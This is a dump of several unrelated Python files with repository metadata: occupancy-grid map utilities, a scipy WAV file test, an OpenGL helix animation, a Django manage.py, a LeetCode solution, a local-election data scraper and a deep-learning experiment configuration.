Xstartx=mapData.info.origin.position.x
Xstarty=mapData.info.origin.position.y
width=mapData.info.width
Data=mapData.data
index=int( ( floor((Xp[1]-Xstarty)/resolution)*width)+( floor((Xp[0]-Xstartx)/resolution) ))
return index
def point_of_index(mapData,i): #索引处点的坐标
y=mapData.info.origin.position.y+(i/mapData.info.width)*mapData.info.resolution
x=mapData.info.origin.position.x+(i-(i/mapData.info.width)*(mapData.info.width))*mapData.info.resolution
return array([x,y])
#________________________________________________________________________________
def informationGain(mapData,point,r): #计算点的信息量
infoGain=0;
index=index_of_point(mapData,point)
r_region=int(r/mapData.info.resolution)
init_index=index-r_region*(mapData.info.width+1)
for n in range(0,2*r_region+1):
start=n*mapData.info.width+init_index
end=start+2*r_region
limit=((start/mapData.info.width)+2)*mapData.info.width
for i in range(start,end+1):
if (i>=0 and i<limit and i<len(mapData.data)):
if(mapData.data[i]==-1 and norm(array(point)-point_of_index(mapData,i))<=r):
infoGain+=1
return infoGain*(mapData.info.resolution**2)
#________________________________________________________________________________
def discount(mapData,assigned_pt,centroids,infoGain,r):
index=index_of_point(mapData,assigned_pt)
r_region=int(r/mapData.info.resolution)
init_index=index-r_region*(mapData.info.width+1)
for n in range(0,2*r_region+1):
start=n*mapData.info.width+init_index
end=start+2*r_region
limit=((start/mapData.info.width)+2)*mapData.info.width
for i in range(start,end+1):
if (i>=0 and i<limit and i<len(mapData.data)):
for j in range(0,len(centroids)):
current_pt=centroids[j]
if(mapData.data[i]==-1 and norm(point_of_index(mapData,i)-current_pt)<=r and norm(point_of_index(mapData,i)-assigned_pt)<=r):
infoGain[j]-=1 #this should be modified, subtract the area of a cell, not 1
return infoGain
#________________________________________________________________________________
def pathCost(path):
if (len(path)>0):
i=len(path)/2
p1=array([path[i-1].pose.position.x,path[i-1].pose.position.y])
p2=array([path[i].pose.position.x,path[i].pose.position.y])
return norm(p1-p2)*(len(path)-1)
else:
return inf
#________________________________________________________________________________
def unvalid(mapData,pt):
index=index_of_point(mapData,pt)
r_region=5
init_index=index-r_region*(mapData.info.width+1)
for n in range(0,2*r_region+1):
start=n*mapData.info.width+init_index
end=start+2*r_region
limit=((start/mapData.info.width)+2)*mapData.info.width
for i in range(start,end+1):
if (i>=0 and i<limit and i<len(mapData.data)):
if(mapData.data[i]==1):
return True
return False
#________________________________________________________________________________
def Nearest(V,x):
n=inf
i=0
for i in range(0,V.shape[0]):
n1=norm(V[i,:]-x)
if (n1<n):
n=n1
result=i
return result
#________________________________________________________________________________
def Nearest2(V,x):
n=inf
result=0
for i in range(0,len(V)):
n1=norm(V[i]-x)
if (n1<n):
n=n1
return i
#________________________________________________________________________________
def gridValue(mapData,Xp):
resolution=mapData.info.resolution
Xstartx=mapData.info.origin.position.x
Xstarty=mapData.info.origin.position.y
width=mapData.info.width
Data=mapData.data
# returns grid value at "Xp" location
#map data: 100 occupied -1 unknown 0 free
index=( floor((Xp[1]-Xstarty)/resolution)*width)+( floor((Xp[0]-Xstartx)/resolution) )
if int(index) < len(Data):
return Data[int(index)]
else:
return 100
|
[
"623395241@qq.com"
] |
623395241@qq.com
|
c4bbebeeaa1fede9542e856ca68e24409905d33f
|
c0f808504dd3d7fd27c39f1503fbc14c1d37bf9f
|
/sources/scipy-scipy-414c1ab/scipy/io/tests/test_wavfile.py
|
266775ecd99e28e8010c480d95ff5fce9e266339
|
[] |
no_license
|
georgiee/lip-sync-lpc
|
7662102d4715e4985c693b316a02d11026ffb117
|
e931cc14fe4e741edabd12471713bf84d53a4250
|
refs/heads/master
| 2018-09-16T08:47:26.368491
| 2018-06-05T17:01:08
| 2018-06-05T17:01:08
| 5,779,592
| 17
| 4
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,146
|
py
|
import os
import tempfile
import warnings
import numpy as np
from numpy.testing import assert_equal, assert_, assert_raises, assert_array_equal
from numpy.testing.utils import WarningManager
from scipy.io import wavfile
def datafile(fn):
return os.path.join(os.path.dirname(__file__), 'data', fn)
def test_read_1():
warn_ctx = WarningManager()
warn_ctx.__enter__()
try:
warnings.simplefilter('ignore', wavfile.WavFileWarning)
rate, data = wavfile.read(datafile('test-44100-le-1ch-4bytes.wav'))
finally:
warn_ctx.__exit__()
assert_equal(rate, 44100)
assert_(np.issubdtype(data.dtype, np.int32))
assert_equal(data.shape, (4410,))
def test_read_2():
rate, data = wavfile.read(datafile('test-8000-le-2ch-1byteu.wav'))
assert_equal(rate, 8000)
assert_(np.issubdtype(data.dtype, np.uint8))
assert_equal(data.shape, (800, 2))
def test_read_fail():
fp = open(datafile('example_1.nc'))
assert_raises(ValueError, wavfile.read, fp)
fp.close()
def _check_roundtrip(rate, dtype, channels):
fd, tmpfile = tempfile.mkstemp(suffix='.wav')
try:
os.close(fd)
data = np.random.rand(100, channels)
if channels == 1:
data = data[:,0]
data = (data*128).astype(dtype)
wavfile.write(tmpfile, rate, data)
rate2, data2 = wavfile.read(tmpfile)
assert_equal(rate, rate2)
assert_(data2.dtype.byteorder in ('<', '=', '|'), msg=data2.dtype)
assert_array_equal(data, data2)
finally:
os.unlink(tmpfile)
def test_write_roundtrip():
for signed in ('i', 'u'):
for size in (1, 2, 4, 8):
if size == 1 and signed == 'i':
# signed 8-bit integer PCM is not allowed
continue
for endianness in ('>', '<'):
if size == 1 and endianness == '<':
continue
for rate in (8000, 32000):
for channels in (1, 2, 5):
dt = np.dtype('%s%s%d' % (endianness, signed, size))
yield _check_roundtrip, rate, dt, channels
|
[
"georgios@kaleadis.de"
] |
georgios@kaleadis.de
|
179abd03f2ae118cfb2b85da6360707ead06748a
|
1b10b46afdf24b4ce4f2d57e315e09e17c0a9c2b
|
/winding_helix.py
|
51d16cff03b2651355fadbdb7bd2a560ed49af5b
|
[] |
no_license
|
tthtlc/sansagraphics
|
e6aad1541dabc85b3871e1890c9f79aa33055355
|
113e559fb128c93ed1f02155ec74e76878b86c37
|
refs/heads/master
| 2021-01-15T15:52:35.126301
| 2020-03-30T16:58:57
| 2020-03-30T16:58:57
| 15,507,431
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,415
|
py
|
# Pygame/PyopenGL example by Bastiaan Zapf, Apr 2009
### From http://python-opengl-examples.blogspot.sg/
#
# Draw an helix, wiggle it pleasantly
#
# Keywords: Alpha Blending, Textures, Animation, Double Buffer
from OpenGL.GL import *
from OpenGL.GLU import *
from math import * # trigonometry
import pygame # just to get a display
# get an OpenGL surface
pygame.init()
pygame.display.set_mode((800,600), pygame.OPENGL|pygame.DOUBLEBUF)
# How to catch errors here?
done = False
t=0
while not done:
t=t+1
# for fun comment out these two lines
glClearColor(0.0, 0.0, 0.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT)
# Get a perspective at the helix
glMatrixMode(GL_PROJECTION);
glLoadIdentity()
gluPerspective(90,1,0.01,1000)
gluLookAt(sin(t/200.0)*3,sin(t/500.0)*3,cos(t/200.0)*3,0,0,0,0,1,0)
# Draw the helix (this ought to be a display list call)
glMatrixMode(GL_MODELVIEW)
# get a texture (this ought not to be inside the inner loop)
texture=glGenTextures( 1 )
glBindTexture( GL_TEXTURE_2D, texture );
glTexEnvf( GL_TEXTURE_ENV, GL_TEXTURE_ENV_MODE, GL_MODULATE );
# set sane defaults for a plethora of potentially uninitialized
# variables
glTexParameterf( GL_TEXTURE_2D, GL_TEXTURE_WRAP_S,
GL_REPEAT);
glTexParameterf( GL_TEXTURE_2D, GL_TEXTURE_WRAP_T,
GL_REPEAT );
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR)
# a texture
#pulse = sin(t/30)*0.5+0.5 # try this one
pulse = 0
texdata=[[[0.0,0,1,1],
[0.0,0,0,0],
[0.0,1,0,1],
[0.0,0,0,0]],
[[0.0,0,0,0],
[pulse,pulse,pulse,1],
[pulse,pulse,pulse,1],
[0.0,0,0,0]],
[[0.0,1,0,1],
[1,pulse,pulse,1],
[pulse,pulse,0,1],
[0.0,0,0,0]],
[[0.0,0,0,0],
[0.0,0,0,0],
[0.0,0,0,0],
[0.0,0,0,0]]];
glTexImage2Df(GL_TEXTURE_2D, 0,4,0,GL_RGBA,
texdata)
glEnable(GL_BLEND);
glBlendFunc (GL_SRC_ALPHA, GL_ONE); # XXX Why GL_ONE?
# alternatively:
# glEnable(GL_DEPTH_TEST);
glEnable( GL_TEXTURE_2D );
# use the texture
glBindTexture( GL_TEXTURE_2D, texture );
# vertices & texture data
glBegin(GL_TRIANGLE_STRIP);
#pulse2 = 0.5
for i in range(0,100):
r=5.0 # try other values - integers as well
R=10.0
d=1 # try other values
j=i
#pulse2 += 0.5
if (i%3==0):
glTexCoord2f(0,i);
glVertex3f( cos(i/r)*cos(j/R) + (-2.5+i*0.05)*sin(j/R), (-2.5+i*0.05)*cos(j/R) - cos(i/r)*sin(j/R), sin(i/r));
elif (i%3==1):
glTexCoord2f(1,i);
glVertex3f( cos(i/r + 3.14/2)*cos(j/R) + (-2.5+i*0.05)*sin(j/R), (-2.5+i*0.05)*cos(j/R) - cos(i/r)*sin(j/R), sin(i/r + 3.14/1));
else:
glTexCoord2f(2,i);
glVertex3f( cos(i/r + 3.14/1)*cos(j/R) + (-2.5+i*0.05)*sin(j/R), (-2.5+i*0.05)*cos(j/R) - cos(i/r)*sin(j/R), sin(i/r+3.14/1));
# glVertex3f( cos(i/r+3.14)*pulse2, -2.5+i*0.05+d+pulse2*1, sin(i/r+3.14)*pulse2);
glEnd();
glFlush()
glDeleteTextures(texture)
pygame.display.flip()
|
[
"htmldeveloper@gmail.com"
] |
htmldeveloper@gmail.com
|
affeefebfe3fea12f782e19ec9b4436fcfec1e64
|
8489a961a13492fea2ef76f18b86fa2ecaec93c2
|
/web_app_interface/marfSite/manage.py
|
67388189c584ba2d010e526d7c135676b6f18c5e
|
[] |
no_license
|
kavanomo/teamMarf
|
84ff8496488cc8f27a997fddbd550798ee6218d4
|
461d23144d26e8836e04e6c930a961fccef28465
|
refs/heads/master
| 2020-03-30T05:14:15.681749
| 2019-03-15T03:33:35
| 2019-03-15T03:33:35
| 150,788,570
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 540
|
py
|
#!/usr/bin/env python
import os
import sys
if __name__ == '__main__':
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'marfSite.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
|
[
"robbie.windsor+git@gmail.com"
] |
robbie.windsor+git@gmail.com
|
84eeb4e216661d1b5592535c6727d2131a0709a8
|
5c84c379978ac4c663d6193ea2e4e156f1fc0922
|
/hard/149_maxpoints_on_a_line.py
|
ed5bf69070d34a3ddba151cc7ec4590f1eb836f8
|
[] |
no_license
|
nraghuveer/leetcode
|
a46483a9fd7f990410d6b9132c618e5d54baf9a7
|
ca045ce2c6d23fb8f92ea9871565b21cbdbeef19
|
refs/heads/master
| 2021-07-01T15:43:43.249587
| 2020-10-15T17:47:38
| 2020-10-15T17:47:38
| 180,434,748
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,806
|
py
|
# https://leetcode.com/problems/max-points-on-a-line/
# using slope ?
# if two points have same slope => colinear
# calculate slope for n points with n - 1 points => O(pow(n,2)) => not good
from collections import defaultdict
from typing import List
def gcd(x,y):
while y:
x, y = y, x % y
return x
class Solution:
def maxPoints(self, points: List[List[int]]) -> int:
"""Get max points from given points that are on given lines"""
if not points:
return 0
slope_map = defaultdict(int)
l = len(points)
max_count = 0
for i in range(l):
curmax = overlap = vertical = 0
for j in range(i+1, l):
# if same point, track this to update count
if points[i] == points[j]:
overlap += 1
# to avoid ZeroDivisionError
elif points[i][0] == points[j][0]:
vertical += 1
else:
x = (points[j][1] - points[i][1])
y = (points[j][0] - points[i][0])
g = gcd(x,y)
x = x/g
y = y/g
slope_map[(x,y)] += 1
curmax = max(curmax, slope_map[(x,y)])
# incase, zerodivisionerror cases are more => consider vertical
curmax = max(curmax, vertical)
# clear the dict, important
# as the these slope are related with the points[i]
slope_map.clear()
# update the global count.
max_count = max(max_count, curmax + overlap + 1)
return max_count
if __name__ == "__main__":
solution = Solution()
assert solution.maxPoints([[1,1],[2,2],[3,3]]) == 3
print('done')
|
[
"raghuveernaraharisetti@gmail.com"
] |
raghuveernaraharisetti@gmail.com
|
b9bb003ddc62e1d45453d22efe039b1eb758af9c
|
20ae4d697181fb9810e13213313f97071e28e8ef
|
/parse/__main__.py
|
5fa9d49de4d1330cc22a9f8513310b2c9a4cc402
|
[] |
no_license
|
software-opal/nz-local-election
|
79afb0ad34a81f5be5018abe0062f0c159c4156a
|
904cd985ef9b225bf3c92c82fcbd66c68b1aa43d
|
refs/heads/master
| 2020-08-03T02:16:59.057271
| 2019-09-28T06:19:21
| 2019-09-28T06:19:21
| 211,593,768
| 0
| 0
| null | 2020-06-07T08:06:50
| 2019-09-29T02:57:20
|
Python
|
UTF-8
|
Python
| false
| false
| 2,985
|
py
|
import itertools
import json
import pathlib
from . import (
COUNCILLORS_URL_FORMATS,
DHB_URLS,
MAYOR_URLS,
REGIONAL_COUNCILLORS_URL_FORMATS,
)
from .load import InvalidPage, parse
from .visit import Requester
ROOT = pathlib.Path(__file__).parent.parent
DATA = ROOT / "public/data"
LOOKUP = ROOT / "src/assets/data_lookup.json"
COMBINED = DATA / "combined.json"
def candidates_json_safe(candidates):
return [c.as_dict() for c in candidates]
class Data:
def __init__(self):
self.r = Requester()
self.data = {}
self.grouped = {}
self.named = {}
def write(self):
LOOKUP.write_text(
json.dumps(
{"grouped": self.grouped, "named": self.named}, sort_keys=True, indent=2
)
)
COMBINED.write_text(json.dumps(self.data, sort_keys=True, indent=2))
def persist(self, url):
print(f"Requesting {url}")
base_url, response = self.r.request(url)
print(f" Parsing {len(response)} bytes of response")
election = parse(base_url, response)
fname = f"{election.id}.json"
self.data[election.id] = election.as_dict()
self.grouped.setdefault(election.type, {}).setdefault(election.region, {})[
election.electorate
] = election.id
self.named[election.id] = fname
(DATA / fname).write_text(
json.dumps(election.as_dict(), sort_keys=True, indent=2)
)
print(f" Written data to {fname}\n")
return election, fname
def main():
DATA.mkdir(parents=True, exist_ok=True)
d = Data()
for url_group in [DHB_URLS, MAYOR_URLS]:
for url in url_group:
try:
d.persist(url)
except InvalidPage:
print("Page didn't represent an election")
pass
d.write()
for url_format_group in [
COUNCILLORS_URL_FORMATS,
REGIONAL_COUNCILLORS_URL_FORMATS,
]:
for format in url_format_group:
old_election_region = None
for i in itertools.count(1):
url = format.format(i)
try:
election, _ = d.persist(url)
except InvalidPage:
print("Page didn't represent an election")
break
if old_election_region is not None:
assert (
old_election_region == election.region
), f"{old_election_region} != {election.region}"
old_election_region = election.region
d.write()
akl_local_board_format = "https://www.policylocal.nz/candidates/CB_076{:02}"
for i in itertools.count(3):
url = akl_local_board_format.format(i)
try:
d.persist(url)
except InvalidPage:
print("Page didn't represent an election")
break
d.write()
if __name__ == "__main__":
main()
|
[
"leesdolphin@gmail.com"
] |
leesdolphin@gmail.com
|
34659a2890a4b19d6a7a1abb7a98dd6fbe5adce9
|
0e1e643e864bcb96cf06f14f4cb559b034e114d0
|
/Exps_7_v3/doc3d/Ablation4_ch016_ep003_7_10/Gather2_W_fixGood_C_change/train/pyr_4s/L6/step10_a.py
|
2202753791e6d77741009c3408d45023e128a019
|
[] |
no_license
|
KongBOy/kong_model2
|
33a94a9d2be5b0f28f9d479b3744e1d0e0ebd307
|
1af20b168ffccf0d5293a393a40a9fa9519410b2
|
refs/heads/master
| 2022-10-14T03:09:22.543998
| 2022-10-06T11:33:42
| 2022-10-06T11:33:42
| 242,080,692
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 140,332
|
py
|
#############################################################################################################################################################################################################
#############################################################################################################################################################################################################
### 把 kong_model2 加入 sys.path
import os
code_exe_path = os.path.realpath(__file__) ### 目前執行 step10_b.py 的 path
code_exe_path_element = code_exe_path.split("\\") ### 把 path 切分 等等 要找出 kong_model 在第幾層
code_dir = "\\".join(code_exe_path_element[:-1])
kong_layer = code_exe_path_element.index("kong_model2") ### 找出 kong_model2 在第幾層
kong_model2_dir = "\\".join(code_exe_path_element[:kong_layer + 1]) ### 定位出 kong_model2 的 dir
import sys ### 把 kong_model2 加入 sys.path
sys.path.append(kong_model2_dir)
sys.path.append(code_dir)
# print(__file__.split("\\")[-1])
# print(" code_exe_path:", code_exe_path)
# print(" code_exe_path_element:", code_exe_path_element)
# print(" code_dir:", code_dir)
# print(" kong_layer:", kong_layer)
# print(" kong_model2_dir:", kong_model2_dir)
#############################################################################################################################################################################################################
kong_to_py_layer = len(code_exe_path_element) - 1 - kong_layer ### 中間 -1 是為了長度轉index
# print(" kong_to_py_layer:", kong_to_py_layer)
if (kong_to_py_layer == 0): template_dir = ""
elif(kong_to_py_layer == 2): template_dir = code_exe_path_element[kong_layer + 1][0:] ### [7:] 是為了去掉 step1x_, 後來覺得好像改有意義的名字不去掉也行所以 改 0
elif(kong_to_py_layer == 3): template_dir = code_exe_path_element[kong_layer + 1][0:] + "/" + code_exe_path_element[kong_layer + 2][0:] ### [5:] 是為了去掉 mask_ ,前面的 mask_ 是為了python 的 module 不能 數字開頭, 隨便加的這樣子, 後來覺得 自動排的順序也可以接受, 所以 改0
elif(kong_to_py_layer > 3): template_dir = code_exe_path_element[kong_layer + 1][0:] + "/" + code_exe_path_element[kong_layer + 2][0:] + "/" + "/".join(code_exe_path_element[kong_layer + 3: -1])
# print(" template_dir:", template_dir) ### 舉例: template_dir: 7_mask_unet/5_os_book_and_paper_have_dtd_hdr_mix_bg_tv_s04_mae
#############################################################################################################################################################################################################
exp_dir = template_dir
#############################################################################################################################################################################################################
from step06_a_datas_obj import *
from step09_4side_L6 import *
from step10_a2_loss_info_obj import *
from step10_b2_exp_builder import Exp_builder
rm_paths = [path for path in sys.path if code_dir in path]
for rm_path in rm_paths: sys.path.remove(rm_path)
rm_moduless = [module for module in sys.modules if "step09" in module]
for rm_module in rm_moduless: del sys.modules[rm_module]
import Exps_7_v3.doc3d.Ablation4_ch016_ep003_7_10.W_w_M_to_C_pyr.pyr_4s.L6.step10_a as W_w_M_to_C_p20_pyr
from Exps_7_v3.doc3d.Ablation4_ch016_ep003_7_10.I_w_M_to_W_pyr.pyr_3s.L5.step10_a import ch032_1side_6__2side_5__3side_2__ep010 as I_w_M_to_W_p20_3s_L5_Good
#############################################################################################################################################################################################################
'''
exp_dir 是 決定 result_dir 的 "上一層"資料夾 名字喔! exp_dir要巢狀也沒問題~
比如:exp_dir = "6_mask_unet/自己命的名字",那 result_dir 就都在:
6_mask_unet/自己命的名字/result_a
6_mask_unet/自己命的名字/result_b
6_mask_unet/自己命的名字/...
'''
use_db_obj = type8_blender_kong_doc3d_v2
use_loss_obj = [mae_s001_sobel_k9_s001_loss_info_builder.set_loss_target("UNet_Wz").copy(), mae_s001_sobel_k9_s001_loss_info_builder.set_loss_target("UNet_Wy").copy(), mae_s001_sobel_k9_s001_loss_info_builder.set_loss_target("UNet_Wx").copy(), mae_s001_sobel_k9_s001_loss_info_builder.set_loss_target("UNet_Cx").copy(), mae_s001_sobel_k9_s001_loss_info_builder.set_loss_target("UNet_Cy").copy()] ### z, y, x 順序是看 step07_b_0b_Multi_UNet 來對應的喔
#############################################################
### 為了resul_analyze畫空白的圖,建一個empty的 Exp_builder
empty = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_1__2side_1__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_1__2side_1__3side_1_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="為了resul_analyze畫空白的圖,建一個empty的 Exp_builder")
#############################################################
# "1" 3 6 10 15 21 28 36 45 55
# side1 OK 1
ch032_1side_1__2side_1__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_1__2side_1__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s1__2s1__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_1__2side_1__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
# 1 "3" 6 10 15 21 28 36 45 55
# side2 OK 4
ch032_1side_2__2side_1__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_2__2side_1__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s2__2s1__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_2__2side_1__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_2__2side_2__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_2__2side_2__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s2__2s2__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_2__2side_2__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_2__2side_2__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_2__2side_2__3side_2_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s2__2s2__3s2__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_2__2side_2__3side_2_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_2__2side_2__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_2__2side_2__3side_2_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s2__2s2__3s2__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_2__2side_2__3side_2_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
# 1 3 "6" 10 15 21 28 36 45 55
# side3 OK 10
ch032_1side_3__2side_1__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_1__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s3__2s1__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_3__2side_1__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_3__2side_2__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_2__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s3__2s2__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_3__2side_2__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_3__2side_2__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_2__3side_2_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s3__2s2__3s2__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_3__2side_2__3side_2_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_3__2side_2__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_2__3side_2_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s3__2s2__3s2__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_3__2side_2__3side_2_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_3__2side_3__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_3__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s3__2s3__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_3__2side_3__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_3__2side_3__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_3__3side_2_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s3__2s3__3s2__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_3__2side_3__3side_2_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_3__2side_3__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_3__3side_2_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s3__2s3__3s2__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_3__2side_3__3side_2_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
